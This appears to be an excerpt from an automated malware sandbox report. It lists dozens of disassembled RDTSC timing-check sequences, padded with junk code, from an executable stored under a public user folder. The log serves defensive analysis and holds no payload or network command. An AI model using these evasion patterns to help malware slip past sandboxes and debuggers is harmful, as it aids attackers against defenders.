                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11A151B second address: 11A1529 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jbe 00007FCCB120DFD6h 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E55F5 second address: 11E55FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E570F second address: 11E573D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB120DFE8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jc 00007FCCB120DFF3h 0x00000013 push eax 0x00000014 push edx 0x00000015 jg 00007FCCB120DFD6h 0x0000001b rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E58FA second address: 11E5953 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB0D02D0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push esi 0x0000000d add dword ptr [ebp+13762E04h], esi 0x00000013 pop edx 0x00000014 mov dx, ax 0x00000017 push 00000004h 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007FCCB0D02D08h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 00000019h 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 pushad 0x00000034 add dword ptr [ebp+137636D8h], ebx 0x0000003a mov dx, 2C04h 0x0000003e popad 0x0000003f mov dword ptr [ebp+138EFB4Bh], esi 0x00000045 nop 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E5953 second address: 11E5957 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E5957 second address: 11E5974 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB0D02D19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E5974 second address: 11E5999 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FCCB120DFE2h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jo 00007FCCB120DFD8h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E6010 second address: 11E6016 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E6016 second address: 11E6026 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCCB120DFDBh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E6026 second address: 11E6073 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 je 00007FCCB0D02D12h 0x0000000f jg 00007FCCB0D02D0Ch 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 pushad 0x0000001a push edx 0x0000001b jmp 00007FCCB0D02D10h 0x00000020 pop edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FCCB0D02D19h 0x00000028 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E6073 second address: 11E6077 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E616D second address: 11E6171 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E6171 second address: 11E6183 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB120DFDEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E6183 second address: 11E61D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB0D02D0Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a movsx ecx, dx 0x0000000d lea eax, dword ptr [ebp+1391FB0Dh] 0x00000013 sbb dx, 5D33h 0x00000018 mov di, si 0x0000001b nop 0x0000001c push ecx 0x0000001d jnp 00007FCCB0D02D0Ch 0x00000023 pop ecx 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 jmp 00007FCCB0D02D18h 0x0000002d push edx 0x0000002e pop edx 0x0000002f popad 0x00000030 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E61D1 second address: 11E61D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1233527 second address: 1233552 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FCCB0D02D0Dh 0x0000000b popad 0x0000000c jns 00007FCCB0D02D0Eh 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 pop edx 0x00000016 popad 0x00000017 pushad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1233552 second address: 1233558 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1233558 second address: 123355E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 123355E second address: 123357E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007FCCB120DFD8h 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FCCB120DFE1h 0x00000014 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1233AD7 second address: 1233AEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCCB0D02D13h 0x00000009 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1233AEE second address: 1233AF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1233AF4 second address: 1233AFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1233AFD second address: 1233B04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1233C3E second address: 1233C42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1233C42 second address: 1233C46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1233C46 second address: 1233C5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FCCB0D02D0Ah 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1233C5B second address: 1233C7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCCB120DFE1h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007FCCB120DFD6h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1233C7B second address: 1233C90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FCCB0D02D0Ah 0x00000010 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1236D92 second address: 1236DA9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FCCB120DFDCh 0x00000008 je 00007FCCB120DFD6h 0x0000000e push ebx 0x0000000f jnl 00007FCCB120DFD6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12371FB second address: 12371FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1239515 second address: 1239536 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FCCB120DFD6h 0x00000008 jmp 00007FCCB120DFDFh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f js 00007FCCB120DFDCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1239536 second address: 123953A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 123FC4B second address: 123FC4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 123FC4F second address: 123FC71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FCCB0D02D17h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 123FC71 second address: 123FC7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pop edx 0x00000009 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 123F547 second address: 123F54D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 123F54D second address: 123F5A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FCCB120DFE8h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007FCCB120DFE8h 0x00000019 popad 0x0000001a push edi 0x0000001b jmp 00007FCCB120DFE4h 0x00000020 pushad 0x00000021 popad 0x00000022 pop edi 0x00000023 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 123F5A5 second address: 123F5AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 123F5AB second address: 123F5AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 123F5AF second address: 123F5BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007FCCB0D02D0Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 123F712 second address: 123F718 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 123F718 second address: 123F71C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 123F71C second address: 123F722 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 123F722 second address: 123F72E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1242D5D second address: 1242D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12425D8 second address: 12425DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12425DE second address: 12425E3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12429E2 second address: 1242A10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FCCB0D02D10h 0x0000000a push esi 0x0000000b pop esi 0x0000000c jmp 00007FCCB0D02D15h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12498ED second address: 12498F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12498F1 second address: 1249901 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007FCCB0D02D06h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1249901 second address: 1249905 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1249905 second address: 1249909 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1249909 second address: 124993C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jne 00007FCCB120DFD6h 0x00000011 jmp 00007FCCB120DFE6h 0x00000016 popad 0x00000017 push edx 0x00000018 jg 00007FCCB120DFD6h 0x0000001e pop edx 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 124807D second address: 124809A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jc 00007FCCB0D02D06h 0x0000000c jmp 00007FCCB0D02D0Fh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 124809A second address: 12480A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 124835C second address: 124837C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pushad 0x00000008 jmp 00007FCCB0D02D16h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1248512 second address: 1248518 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1248518 second address: 124851D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 124851D second address: 1248527 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FCCB120DFD6h 0x0000000a rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1248527 second address: 1248543 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB0D02D10h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1248543 second address: 1248547 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1248547 second address: 1248557 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCCB0D02D0Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1248557 second address: 124855D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 124855D second address: 1248563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1248739 second address: 124873F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E5B4F second address: 11E5BC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007FCCB0D02D0Ah 0x0000000c pop ecx 0x0000000d popad 0x0000000e nop 0x0000000f mov edi, dword ptr [ebp+13763215h] 0x00000015 mov dword ptr [ebp+13761C71h], edi 0x0000001b mov ebx, dword ptr [ebp+1391FB4Ch] 0x00000021 push 00000000h 0x00000023 push ecx 0x00000024 call 00007FCCB0D02D08h 0x00000029 pop ecx 0x0000002a mov dword ptr [esp+04h], ecx 0x0000002e add dword ptr [esp+04h], 00000019h 0x00000036 inc ecx 0x00000037 push ecx 0x00000038 ret 0x00000039 pop ecx 0x0000003a ret 0x0000003b mov di, C6D2h 0x0000003f add eax, ebx 0x00000041 mov edx, dword ptr [ebp+13762A90h] 0x00000047 nop 0x00000048 pushad 0x00000049 pushad 0x0000004a jmp 00007FCCB0D02D14h 0x0000004f pushad 0x00000050 popad 0x00000051 popad 0x00000052 push eax 0x00000053 push edx 0x00000054 push edi 0x00000055 pop edi 0x00000056 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E5BC0 second address: 11E5BC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E5BC4 second address: 11E5BD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E5BD2 second address: 11E5BD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E5BD6 second address: 11E5BDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E5BDC second address: 11E5BE6 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FCCB120DFDCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12489E3 second address: 12489E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1248B76 second address: 1248B91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB120DFE5h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1251EF7 second address: 1251F06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007FCCB0D02D06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1251F06 second address: 1251F21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCCB120DFE0h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1251F21 second address: 1251F2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCCB0D02D0Ah 0x00000009 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1251F2F second address: 1251F55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnc 00007FCCB120DFD6h 0x0000000f jmp 00007FCCB120DFE2h 0x00000014 push esi 0x00000015 pop esi 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1250154 second address: 125015A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 125057E second address: 125059C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB120DFE8h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 125059C second address: 12505B9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FCCB0D02D13h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12505B9 second address: 12505BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1250D8F second address: 1250D97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1250D97 second address: 1250D9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1251089 second address: 125108F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1254FC3 second address: 1254FDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB120DFDFh 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1254FDE second address: 1254FE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1254FE2 second address: 1254FE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1254FE6 second address: 1255007 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCCB0D02D11h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007FCCB0D02D06h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1255007 second address: 125500B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 125500B second address: 125501B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jbe 00007FCCB0D02D06h 0x00000010 rdtsc
